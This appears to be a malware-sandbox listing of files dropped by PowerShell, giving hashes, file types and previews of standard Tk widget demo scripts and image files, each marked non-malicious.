                                                                                                                                                                                                                      Entropy (8bit):4.700930384228759
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:aJ1H14bIXegXJbf7qFTchnJH/RsgIO1IGMqOUtDk5p0zIYtzg:ssIXe+bDsTSHpNIHEL0F
                                                                                                                                                                                                                      MD5:847FBD712322411C45B611E59A9580D1
                                                                                                                                                                                                                      SHA1:05148FF7FFABC81C3CB93E4378F6049FEC79D47B
                                                                                                                                                                                                                      SHA-256:9675CAE23D2481E8EDD23B6393CD1BBA39815858AC4DDB2A73358EB0C2D1EC8A
                                                                                                                                                                                                                      SHA-512:FCB57240ECA6EAFD270DF0E5ECCC8C413341517BCEBC4B7AB7542D59109DDB9B153145E50AB6095BBA02224B678BF3F2C02789CCEAF66BA1DE8D7B85B206328B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# entry1.tcl --..#..# This demonstration script creates several entry widgets without..# scrollbars.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .entry1..catch {destroy $w}..toplevel $w..wm title $w "Entry Demonstration (no scrollbars)"..wm iconname $w "entry1"..positionWindow $w....label $w.msg -font $font -wraplength 5i -justify left -text "Three different entries are displayed below. You can add characters by pointing, clicking and typing. The normal Motif editing characters are supported, along with many Emacs bindings. For example, Backspace and Control-h delete the character to the left of the insertion cursor and Delete and Control-d delete the chararacter to the right of the insertion cursor. For entries that are too large to fit in the window all at once, you can scan through the entries by dragging with mouse the middle mouse button pressed."..pack $w.msg -side top....## See Code /
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (635), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2152
                                                                                                                                                                                                                      Entropy (8bit):4.778948788843322
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:6uNkLXe+0X9mSHk9XNIHEZLpR8LrSm4nu2JAy:6CkLO+tSHk9XNIkRoLZ2JAy
                                                                                                                                                                                                                      MD5:190E573E0D1B10F35402C415E2D45E1D
                                                                                                                                                                                                                      SHA1:A27EB61C7AFFDE2109F77E21D3D962CDD74DC7F0
                                                                                                                                                                                                                      SHA-256:83743F534012C70C87C3C1133B17B00A332C8E10A7436697E805B45F29B392B1
                                                                                                                                                                                                                      SHA-512:19A559947D53279649F64410303E79017A82ABA5AC8DED4F295ADE8301CB2CAC3D4D14C0550001A369BA4E26290003EE2AF461D69733D220280A96C3451D90B4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# entry2.tcl --..#..# This demonstration script is the same as the entry1.tcl script..# except that it creates scrollbars for the entries.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .entry2..catch {destroy $w}..toplevel $w..wm title $w "Entry Demonstration (with scrollbars)"..wm iconname $w "entry2"..positionWindow $w....label $w.msg -font $font -wraplength 5i -justify left -text "Three different entries are displayed below, with a scrollbar for each entry. You can add characters by pointing, clicking and typing. The normal Motif editing characters are supported, along with many Emacs bindings. For example, Backspace and Control-h delete the character to the left of the insertion cursor and Delete and Control-d delete the chararacter to the right of the insertion cursor. For entries that are too large to fit in the window all at once, you can scan through the entries with the scrollbars, or
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6287
                                                                                                                                                                                                                      Entropy (8bit):5.01952417669646
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:nUO+j8W7XHJXb7x5Vgpi2WP/ih8UiPXtR3Orj7m2JQsg49NB0R/nILogIMU7irBj:UO+o6J/rHvvz3OrPRJA49NSCB9Vvx
                                                                                                                                                                                                                      MD5:B4B4632463D098F83FFAC8DF53C88DD2
                                                                                                                                                                                                                      SHA1:D613DFE4C4077CEB3E5C1DE2048D4F5A2681C02D
                                                                                                                                                                                                                      SHA-256:251B02601CA72E97378201085CEF6A1A174BA1E16B60E735B508DD37F51F0F0E
                                                                                                                                                                                                                      SHA-512:EC013BEC91776D0969AB9753A7AD1E75BDDD3FF78E5E539B212B691174BCE03C87AE5E4B269E98EB6D642484665502B010301289C43F5663C6893E289580E121
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# entry3.tcl --..#..# This demonstration script creates several entry widgets whose..# permitted input is constrained in some way. It also shows off a..# password entry.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .entry3..catch {destroy $w}..toplevel $w..wm title $w "Constrained Entry Demonstration"..wm iconname $w "entry3"..positionWindow $w....label $w.msg -font $font -wraplength 5i -justify left -text "Four different\...entries are displayed below. You can add characters by pointing,\...clicking and typing, though each is constrained in what it will\...accept. The first only accepts 32-bit integers or the empty string\...(checking when focus leaves it) and will flash to indicate any\...problem. The second only accepts strings with fewer than ten\...characters and sounds the bell when an attempt to go over the limit\...is made. The third accepts US phone numbers, mapping letters to\...the
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2432
                                                                                                                                                                                                                      Entropy (8bit):4.942500683447865
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:wC0Xe+/qohL9/l0QTaywcRDXBy4RJhO2DC25JuVscv32iKdwfCuS/s:wC0OTohL4Q3zRAgJh3DCwIVscv32LMr
                                                                                                                                                                                                                      MD5:6C473C579F381D787E0C4EEEEFA2EF9D
                                                                                                                                                                                                                      SHA1:EA2CE4313153AC726BB8601C0A813B07ACF9398F
                                                                                                                                                                                                                      SHA-256:277669C033FFE1450F762892E31F9DED824776E5E70D6132EEB167FD15533F9B
                                                                                                                                                                                                                      SHA-512:C15EF55FD0F15D9F269038B061304709AE85907C27F5415B344B1497078F3B1DB6F99433C64720AD1B117488ACB8DAB2B97CBD5879C3BBE0B7BAD9CBE0A42B29
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# filebox.tcl --..#..# This demonstration script prompts the user to select a file.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .filebox..catch {destroy $w}..toplevel $w..wm title $w "File Selection Dialogs"..wm iconname $w "filebox"..positionWindow $w....ttk::frame $w._bg..place $w._bg -x 0 -y 0 -relwidth 1 -relheight 1....ttk::label $w.msg -font $font -wraplength 4i -justify left -text "Enter a file name in the entry box or click on the \"Browse\" buttons to select a file name using the file selection dialog."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....foreach i {open save} {.. set f [ttk::frame $w.$i].. ttk::label $f.lab -text "Select a file to $i: " -anchor e.. ttk::entry $f.ent -width 20.. ttk::button $f.but -text "Browse ..." -command "fileDialog $w $f.ent $i".. pack $f.lab -side left..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (310), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):82362
                                                                                                                                                                                                                      Entropy (8bit):4.700708747847357
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:4CMYvHXoB+VJgk8Tq1nOUz+9g55QUAyEAj4lsLtJ3T+pZoRiE:0YPoB+Xf1nOUzmg55QUATlsjj+pZoRiE
                                                                                                                                                                                                                      MD5:D1AEEEEC1EF18CDFD46CC4E242EB0D80
                                                                                                                                                                                                                      SHA1:9043BF047A96DFD47C3AAF0D30CCA36B29426968
                                                                                                                                                                                                                      SHA-256:F983992E0F89D6B6AF89FD607B221A15FE50AC18C5C5A0AFA9A17D2A2A5BE961
                                                                                                                                                                                                                      SHA-512:297A9B965BB4212A9FB7A7C9E8BF1DE639E0C58BE912A4F130DBDB53AEA78417F388AA4257DC3C8939B7669605E1C6E75F9B6D924F98C01BFD4311BEA35B4433
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# floor.tcl --..#..# This demonstration script creates a canvas widet that displays the..# floorplan for DEC's Western Research Laboratory.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....# floorDisplay --..# Recreate the floorplan display in the canvas given by "w". The..# floor given by "active" is displayed on top with its office structure..# visible...#..# Arguments:..# w -..Name of the canvas window...# active -.Number of active floor (1, 2, or 3).....proc floorDisplay {w active} {.. global floorLabels floorItems colors activeFloor.... if {$activeFloor == $active} {...return.. }.... $w delete all.. set activeFloor $active.... # First go through the three floors, displaying the backgrounds for.. # each floor..... bg1 $w $colors(bg1) $colors(outline1).. bg2 $w $colors(bg2) $colors(outline2).. bg3 $w $colors(bg3) $colors(outline3).... # Raise the background for the activ
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1777
                                                                                                                                                                                                                      Entropy (8bit):4.79523301151787
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:ymXeEEBaK++1QA9Cbzdy96GmiPuzlxaqoxjxaB/45iMHCZoGy:1OX+/A9CbzdY6uiHc0Jy
                                                                                                                                                                                                                      MD5:0FFCC39F2C28C79F0B42F2BADFDF3EDB
                                                                                                                                                                                                                      SHA1:81891C14C871FC7C319A7DAE3DB697255D1C113F
                                                                                                                                                                                                                      SHA-256:9BF3D1F798589C269ECFD2B76DDE820FFF0BE027E42C34D4BB13A6B78A5C4F05
                                                                                                                                                                                                                      SHA-512:30DC7A472A2F920C46644C5528CF337060C2731B60EBC7B98B370256A7C6430D4F0C01EDBDA07F968CCAF4EA1ADB98DBBC3BEBE50E61B043120AB976AA1AEB65
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# fontchoose.tcl --..#..# Show off the stock font selector dialog....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .fontchoose..catch {destroy $w}..toplevel $w..wm title $w "Font Selection Dialog"..wm iconname $w "fontchooser"..positionWindow $w....catch {font create FontchooseDemoFont {*}[font actual TkDefaultFont]}....# The font chooser needs to be configured and then shown...proc SelectFont {parent} {.. tk fontchooser configure -font FontchooseDemoFont \.. -command ApplyFont -parent $parent.. tk fontchooser show..}....proc ApplyFont {font} {.. font configure FontchooseDemoFont {*}[font actual $font]..}....# When the visibility of the fontchooser changes, the following event is fired..# to the parent widget...#..bind $w <<TkFontchooserVisibility>> {.. if {[tk fontchooser configure -visible]} {.. %W.f.font state disabled.. } else {.. %W.f.font state !disabled..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1084
                                                                                                                                                                                                                      Entropy (8bit):4.839924845770767
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:XrH14IOMFXegXaj8RchzCOaU5V5p0zlwx7Ml1PW1WMaWZS1G5w:ZNFFXezj6qClBwx7sVW1WMaWZSc5w
                                                                                                                                                                                                                      MD5:CD950630D91C6B2BB4F824FC03D4A2CB
                                                                                                                                                                                                                      SHA1:32405AB260B43C205EEDBFB76DDFE72F435EB953
                                                                                                                                                                                                                      SHA-256:9B1DE253D0BD2E679A4759F2C9C486105813C95A7F55696914D6C8874E91C6A1
                                                                                                                                                                                                                      SHA-512:7002374B7F29D7CA312367111DBA0ECE7BAB6CF11A68549B397E4D835C75AAC206BD3F823605A559BFDA6AB893C592B16C618067AF70E1FE98996C61F8F179FF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# form.tcl --..#..# This demonstration script creates a simple form with a bunch..# of entry widgets.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .form..catch {destroy $w}..toplevel $w..wm title $w "Form Demonstration"..wm iconname $w "form"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "This window contains a simple form where you can type in the various entries and use tabs to move circularly between the entries."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....foreach i {f1 f2 f3 f4 f5} {.. frame $w.$i -bd 2.. entry $w.$i.entry -relief sunken -width 40.. label $w.$i.label.. pack $w.$i.entry -side right.. pack $w.$i.label -side left..}..$w.f1.label config -text Name:..$w.f2.label config -text Address:..$w.f5.label config -text Phone:..pack $w.msg $w.f1 $w.f2 $w.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):58499
                                                                                                                                                                                                                      Entropy (8bit):5.111314338954672
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:TTzeOOfXy3hCrzkz0F3C89jwXdH2RFBi8owvxRyx0bjbodHiIixMV8y8hovepq:TT+/yOzKC32XdWRFFoEb3Iik5WI
                                                                                                                                                                                                                      MD5:4B68CFC692C85E7587CAD004114F17D0
                                                                                                                                                                                                                      SHA1:590B48212152387640E7E14519B14D3C1A984508
                                                                                                                                                                                                                      SHA-256:CE4BDE7E5895E4ABDCCC702CC9790FD3231C8E55AF80BA3F28B65AA7ED2D2947
                                                                                                                                                                                                                      SHA-512:FA66F4BFCA2D67C7F164ACA3E1E76BA2CBB4AC885883FD5E388668149FAA854F8B1E13A066E6A933A40935F4AF26B42935F657044F6EDB25A367F6D1ED6666FA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:##+#################################################################..#..# TkGoldberg.tcl..# by Keith Vetter, March 13, 2003..#..# "Man will always find a difficult means to perform a simple task"..# Rube Goldberg..#..# Reproduced here with permission...#..##+#################################################################..#..# Keith Vetter 2003-03-21: this started out as a simple little program..# but was so much fun that it grew and grew. So I apologize about the..# size but I just couldn't resist sharing it...#..# This is a whizzlet that does a Rube Goldberg type animation, the..# design of which comes from an New Years e-card from IncrediMail...# That version had nice sound effects which I eschewed. On the other..# hand, that version was in black and white (actually dark blue and..# light blue) and this one is fully colorized...#..# One thing I learned from this project is that drawing filled complex..# objects on a canvas is really hard. More often than not I had to..# draw each
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):531
                                                                                                                                                                                                                      Entropy (8bit):4.736088313657098
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:dFIpWyUjuipzyi+jMJQRbiJ8LglfYZed5q58HCbss9BOxErRYa9v:dFIcuSzy0JQiuZenqRAW4xE1Yg
                                                                                                                                                                                                                      MD5:3136374513AE741007D8E9C1CDB9ADC0
                                                                                                                                                                                                                      SHA1:F9CFCD8715539908C112101B42EDBBE0C86DD595
                                                                                                                                                                                                                      SHA-256:741BBAF0DC065EB4FCC7B655E0F830BCE6C9D9C22CF61AC9F18C17986819F414
                                                                                                                                                                                                                      SHA-512:4F9DEB7DA46EDD2156D716F10AC1BEA58A7E215E55A260C796B3816C9A558D9217702507C052F90E66EC63A36E660385057B0506DD343A736A32A30CF9702DF9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" ${1+"$@"}....# hello --..# Simple Tk script to create a button that prints "Hello, world"...# Click on the button to terminate the program.....package require Tk....# The first line below creates the button, and the second line..# asks the packer to shrink-wrap the application's main window..# around the button.....button .hello -text "Hello, world" -command {.. puts stdout "Hello, world"; destroy ...}..pack .hello....# Local Variables:..# mode: tcl..# End:..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1542
                                                                                                                                                                                                                      Entropy (8bit):4.899740970173704
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:LHEHXegXqh55G9rchaF8zp0zPpR+Q2RgD3Fo+oupOy/FNwIGhz72Xxz72M:OXeDPqFaeLpR92ROS+ouMyIIGhOXxOM
                                                                                                                                                                                                                      MD5:6CB3CC7A67D31E07CF1DAB263626960F
                                                                                                                                                                                                                      SHA1:878567C7B3FF0DA61BB064F21FF00944803C0A21
                                                                                                                                                                                                                      SHA-256:0AB4EBC5F7AF945BCB81AABBF0F7839D88D3347C0F1988E2A6366EEE090564F5
                                                                                                                                                                                                                      SHA-512:BB7DFDC551B344BD75C21C882886C601B78EA374035F6A03318E94C0D9B2C902B30EDBCC0E3ECC858D02683E91A61E358480DE2167F6DAEA5B4BFCFE8D9A976C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# hscale.tcl --..#..# This demonstration script shows an example with a horizontal scale.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .hscale..catch {destroy $w}..toplevel $w..wm title $w "Horizontal Scale Demonstration"..wm iconname $w "hscale"..positionWindow $w....label $w.msg -font $font -wraplength 3.5i -justify left -text "An arrow and a horizontal scale are displayed below. If you click or drag mouse button 1 in the scale, you can change the length of the arrow."..pack $w.msg -side top -padx .5c....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....frame $w.frame -borderwidth 10..pack $w.frame -side top -fill x....canvas $w.frame.canvas -width 50 -height 50 -bd 0 -highlightthickness 0..$w.frame.canvas create polygon 0 0 1 1 2 2 -fill DeepSkyBlue3 -tags poly..$w.frame.canvas create line 0 0 1 1 2 2 0 0 -fill black -tags line..scale $w.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (481), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2114
                                                                                                                                                                                                                      Entropy (8bit):4.844042414217722
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:qZo6XeC2JJxyInvP9qV1J61Jp1Jd1JspRXn1tS36Y1F1a:2Orn9KOV5Yr7S3bzA
                                                                                                                                                                                                                      MD5:26CAD45CA2853C28D6C329A7D5FC9FAD
                                                                                                                                                                                                                      SHA1:727798D92FA5FB527AE4B353388D2B70771166A3
                                                                                                                                                                                                                      SHA-256:F8818B41F8661AC17DB45D622855909865B8A5CB210FC1B22F3375F3511ED47C
                                                                                                                                                                                                                      SHA-512:EADA6A5163C27C1ECB4D43685449B46E4B1F699A1A4D87F0DE5D0407619B4F9553BADC885DA4F03337619FC492D8B4919F93E8823A1A334E3F40FA046764C474
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# icon.tcl --..#..# This demonstration script creates a toplevel window containing..# buttons that display bitmaps instead of text.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .icon..catch {destroy $w}..toplevel $w..wm title $w "Iconic Button Demonstration"..wm iconname $w "icon"..positionWindow $w....label $w.msg -font $font -wraplength 5i -justify left -text "This window shows three ways of using bitmaps or images in radiobuttons and checkbuttons. On the left are two radiobuttons, each of which displays a bitmap and an indicator. In the middle is a checkbutton that displays a different image depending on whether it is selected or not. On the right is a checkbutton that displays a single bitmap but changes its background color to indicate whether or not it is selected."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1037
                                                                                                                                                                                                                      Entropy (8bit):4.828304821711349
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:hHjFXegXCbv+kBG8chzYEmB+5p0zrP9qTtZGHs261psxUtZZsD61pixAv:PXeZbmj8qUvP9qTt2Q1psxUtvb1pixK
                                                                                                                                                                                                                      MD5:46EEEF0871AC5894712E6EDC88F3725A
                                                                                                                                                                                                                      SHA1:B5A4BBF2C548006F23E01F458DC0BD077A35DE62
                                                                                                                                                                                                                      SHA-256:FCC89527B6027B143DA4449D13BAAD8EB1604A7B86D4824A865465EF6F40AC3B
                                                                                                                                                                                                                      SHA-512:C979F39A508E4495E56B4DB8233EEB7C39DA51AE17551FAFB6AF6223488AEF908C8D85C3A62C64A780B6B7E0637DD7304A08E8715400A511E48B04D26363DCEE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# image1.tcl --..#..# This demonstration script displays two image widgets.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .image1..catch {destroy $w}..toplevel $w..wm title $w "Image Demonstration #1"..wm iconname $w "Image1"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "This demonstration displays two images, each in a separate label widget."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....# Main widget program sets variable tk_demoDirectory..catch {image delete image1a}..image create photo image1a -file [file join $tk_demoDirectory images earth.gif]..label $w.l1 -image image1a -bd 1 -relief sunken....catch {image delete image1b}..image create photo image1b \...-file [file join $tk_demoDirectory images earthris.gif]..label $w.l2 -image image1b -bd 1 -relief sunken....pack $w.l1
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (304), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3467
                                                                                                                                                                                                                      Entropy (8bit):4.871576175854694
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:2/OsAD3Rk+iVbpfzq20VNMLnRtFSBiQ3qfWw1TD792J2Y3s:2/OsI3Rk+iffm20V2zvsdqWwB79Uc
                                                                                                                                                                                                                      MD5:EE3BCE3731ABFFCA28001F3B730AEE9E
                                                                                                                                                                                                                      SHA1:466C97DA5222081FC7A9F92C22905BC9F72ECB82
                                                                                                                                                                                                                      SHA-256:8E60CEC6BBAF17048BC2C1B6B147D2C85A7014B744EB7F7EFE533D9EF3932D58
                                                                                                                                                                                                                      SHA-512:710305D3D7C1C6A3A7829426DBC0870AEFD71482B292CB868508A8835BFDBECB33A092529812C92A56B817A41073F015405072A17C47898503AB82810E3443CD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# image2.tcl --..#..# This demonstration script creates a simple collection of widgets..# that allow you to select and view images in a Tk label.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....# loadDir --..# This procedure reloads the directory listbox from the directory..# named in the demo's entry...#..# Arguments:..# w -...Name of the toplevel window of the demo.....proc loadDir w {.. global dirName.... $w.f.list delete 0 end.. foreach i [lsort [glob -type f -directory $dirName *]] {...$w.f.list insert end [file tail $i].. }..}....# selectAndLoadDir --..# This procedure pops up a dialog to ask for a directory to load into..# the listobx and (if the user presses OK) reloads the directory..# listbox from the directory named in the demo's entry...#..# Arguments:..# w -...Name of the toplevel window of the demo.....proc selectAndLoadDir w {.. global dirName.. set dir [tk_chooseDirectory
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 320 x 200
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):51559
                                                                                                                                                                                                                      Entropy (8bit):7.786249867568159
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:Qa9/o4hA16E/t15bqjc6EHToAQJOFuRVwOZhuI:QsA4h3yt1Uj5EHUAQJ8uMAZ
                                                                                                                                                                                                                      MD5:A6FDDC46ECB58230BD94DD22F2CA56B8
                                                                                                                                                                                                                      SHA1:8DD8CEFD6413F59C0339593447BE43857BABCCE4
                                                                                                                                                                                                                      SHA-256:BF29C94949F125A04FEE6BDF93BA8F358F26E9E39AA7A4977466834B3133FCB7
                                                                                                                                                                                                                      SHA-512:43E22E78FFBB8DEA92A7128B0DED9B217EE7B5006555A4C6450A93776DC6E0135CC99D127362C28113BBF768E2C1A7743659744C3CDA3CB44E058CAFA2E8A6B9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:GIF89a@................................................................. .. .. .. .. .. .. . ..(. (( 00(88(88(@80@@0@H0@H8@80H@0HH0H88H@8HH8HP8HX8HH@HP@HX@H`@H80P@0P88P@8PH8PP8P@@PH@PP@PX@P`@PPHPXHP`HPhHP88X@8XH8XP8X@@XH@XP@XX@XHHXPHXXHX`HXhHXXPX`PXhPXpPXhXX@@`H@`P@`HH`PH`XH``H`PP`XP``P`hP`pP``X`hX`pX`xX`p``x``H@hHHhPHhXHh`HhPPhXPh`PhhPhpPhXXh`XhhXhpXhxXhh`hp`hx`h.`hxhh.hh.hhPPpXPp`PpXXp`XphXppXph`pp`px`p.`pphpxhp.hp.hp.hp.pp.pp.pp.pp.xp.xpPPxXXx`XxhXxh`xp`xx`xphxxhx.hx.hxxpx.px.px.px.px.xx.xx.xx.xx..x..x..x..xh`.ph.xh.xp..p..p..x..x..x..x..x.............................x..x..x........................................................................................................................................................................................!.......,....@........0X@.......4@..B...:<. .....D|H.AC..+~l8`c....D.."G...Z. ......X....../...s..+Z......_.x.....S`Uy.....0H|..3............P..6gN.....0.....&.....].v......]..t:F.6m..o..&lA.e..0\H...h.i1D...C...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8157
                                                                                                                                                                                                                      Entropy (8bit):7.960029137514831
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:DSCoSoCHQMi16X2zMoUT8nho10l/fOq8kQYIbVp5o7CM8:24omiX0T8nho10lHykFn8
                                                                                                                                                                                                                      MD5:D0312D9A617BA1214FD3EDCE5EC5DA53
                                                                                                                                                                                                                      SHA1:08EF134A380513E3FF08A177D86F980E2C3E531B
                                                                                                                                                                                                                      SHA-256:9BF8D96016039D7FDB2FFC506743724636A70ED5925199AAB64CA20820963BDE
                                                                                                                                                                                                                      SHA-512:3C37C3A8603BE0A32AE0721F439B716B9D427D83D08BD8C25BA289D3DCA8F1EBFA5283543E19555B22DB6CBDCE3798FD77B288A19EA3504B50E4C97C13B6674B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............bKGD..............pHYs.................tIME.....'(.I......iTXtComment.....Created with GIMPd.e....AIDATx..Y.$.}.....n}.}V.p..2.p.E..).Jdm.eQ...N..8.I.#/.....8..8.c(.b..-.(..8").g....}..vWw..a..`'...G.r..n4......sN.......................S........?.@.8.~_.T~.s.o.....+.8.2IA.G.=...SO=7Y...d.M.IL.nv.,KH..a,"k"..%.m./.!J.tmQ5..7.Vz.V5./^.Y..F5.!G2......MHi.!....Z.rD..X........|>.-.'|..... .....F*E.=.Ej5....4;.....F*......4..?U.o|.....H)2v(.0].WV;o.~.;/..?.Z7s@...("....\..o..oc...X..k.$...g~o..._LO."....F%.../.V$.$.B...:.u.....&P.$.I@...KDZ...@..z....(.$1g..raa.......4.+...jl.....V.F...+..V....b...........l7..'......6..CS.nB..xf..6R....$...C..\l8.Yjrt.HOZa"..H2".I...Y....M|Ifv.0.L.[Py..*......_}.o..$I....U..(...F5....+Z.z..K.............=O.?z..?...z...#S...$H.$.~d.D.t........G,F"./n25.3S....07....R....X..l...R.;....3.vqe..)$.vK8q..G.\...1.bE..w..JqD. ...D.d!....z.KO...=0s.....]..].0!.. ....A^...,...m.n@..L....]..#
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 87a, 320 x 200
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6343
                                                                                                                                                                                                                      Entropy (8bit):7.60421228624189
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:EeSDPfecM7mHVhEje/tL6qaOdROJ3NZq7wtZ2aGIFD:rGfPV+iL6qa5c7wm4D
                                                                                                                                                                                                                      MD5:4D10E3A9B9C5CC5AB490962AFA9BFE6C
                                                                                                                                                                                                                      SHA1:59609B8A8F221D3FC1CB58D3BF5C7E58104E3FDB
